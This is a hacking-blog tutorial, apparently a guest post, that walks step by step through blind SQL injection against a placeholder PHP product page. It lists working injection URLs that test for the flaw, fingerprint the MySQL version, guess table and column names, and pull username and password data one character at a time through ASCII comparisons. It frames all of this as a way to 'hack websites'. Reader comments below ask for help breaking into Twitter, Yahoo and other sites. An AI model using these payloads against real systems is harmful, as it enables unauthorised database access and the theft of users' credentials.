SQL Injection Part 3 - Blind Sql Injection

In my previous articles, i have shown you how we can hack websites using simple SQL injection and Query based basic SQL injection. Today i am going to show you the detailed concept of Blind SQL injection.When the website is vulnerable to sql injection but not showing any data on it's pages we go for blind SQL injection. Blind injection is a little more complicated/time consuming. So before going into Blind sql injection, you must have the knowledge of basic SQL injections. So it is strongly recommended you to read my previous articles before proceeding.


Here is the vulnerable link.
http://vulnerablesite.com/product.php?id=12
When we visit the url we see a product article with a title and content.


Testing For Vulnerability
We test the injection is subject to a blind attack by going to the following link.
http:// vulnerablesite.com/product.php?id=12 and 1=1
we should see the same url and contents, then try going to
http:// vulnerablesite.com/product.php?id=12 and 1=2
on a successful injection you will see content missing on the page. Because 1=2 is always false.

MySQL Version
http:// vulnerablesite.com/product.php?id=12 and substring(@@version,1,1)=4
what i did here was get the first character of @@version and compare it to =4, if its TRUE, the page loads normally. It means the version is 4. If there is any content missing, we change the 4 to  5 and try again, this time the page loads normally with the content there so we know were dealing with Mysql5



Checking For Table Names
http:// vulnerablesite.com/product.php?id=12 and (SELECT 1 from admin limit 0,1)=1
I tried guessing for table admin, if there is a table called admin it will load normally. Just change the table to guess table names. If it gives an error or content missing,then the table doesn’t exist. So try another table name.



Checking For Column Names
If you are lucky and guessed some good table names we now can try guessing some columns within those tables.
http:// vulnerablesite.com/product.php?id=12 and (SELECT substring(concat(1,password),1,1) from users limit 0,1)=1

If the column password exists, then the page loads normally else try another column name.Now let us assume that we got the table name admin and two columns username and password. We have to pull the data from these table/columns.



Pulling Data From Found Table/Columns
This is the actual part that takes lots of time. We use ascii characters in order to pull data since no data will be displayed on the page.
http:// vulnerablesite.com/product.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>100

In the above example,I have set user id = 2 and trying to pull the password.  If the ascii char was greater then 100 the page will load normally. In our case the page doesn't load with the content so we know the first char is less then 100, we guess again.
http:// vulnerablesite.com/product.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>80

page loads normally with >80, true. We go higher.
http:// vulnerablesite.com/product.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>90
false, so we go lower.

http:// vulnerablesite.com/product.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>86
false. We now narrowed it down to be greater then 85 but not greater then 86. So we know our number is 86! You can test by doing =86 if you want to be sure, it may be confusing at first. Using an ascii converter we knows char(86) is 'V', so the first letter of our returned row is 'V'.


To get the next character we modify the sub string.
http:// vulnerablesite.com/product.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>100

I changed the substring ,1,1 to 2,1. now it returns the 2nd character of the subselect, 1 character in length. we do the same thing again as the first char. This time >100 returned true so we raise the number.
http:// vulnerablesite.com/product.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>120
false, lower the 120
http:// vulnerablesite.com/product.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>110
false, lower
http:// vulnerablesite.com/product.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>105


false,lower
http:// vulnerablesite.com/product.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>103


true, higher
http:// vulnerablesite.com/product.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>104
, we see that its greater then 104 and NOT greater then 105 making the number we want 105. char(105) is 'i'. So we have 'Vi' so far. Keep incrementing the substring until you get to the end where >0 will return false.

I am giving you an ascii code chart for better understanding.

Or you can go online for the same chart from the following link.

Hope you liked this article, feel free to leave your comments for further doubts and clarifications.

About the Guest Author:
This article is written by Mr Srinivas, He owns Hackinginception where he writes articles related to hacking .If your interested in writing a guest post @Hackaholic please contact me

Subscribe to Hackaholic

Enjoyed this article?
Subscribe to "Hackaholic"and get daily
updates in your inbox for free!

Related Posts Plugin for WordPress, Blogger...

Ra one

Excellent one ! i was searching this for a long time thank u john and srinivas :)

REPLY
Anonymous

Hello. This is a Good Tutorial But I was Thinking That anyone Could Tell me How to Hack an Twitter account that is not active and not checked email and not used anymore, cause I need to recover it. Please anyone help!!

REPLY
piit

can this method be used for yahoo mail?

REPLY
Anonymous

i wanted to hack a website through sql injection your articals are based on php but it's not working with sit? =something so please help me

REPLY

Use the form below to comment. No spam please!!!

© 101hacker | Design by Mukund edited by John
Powered by Blogger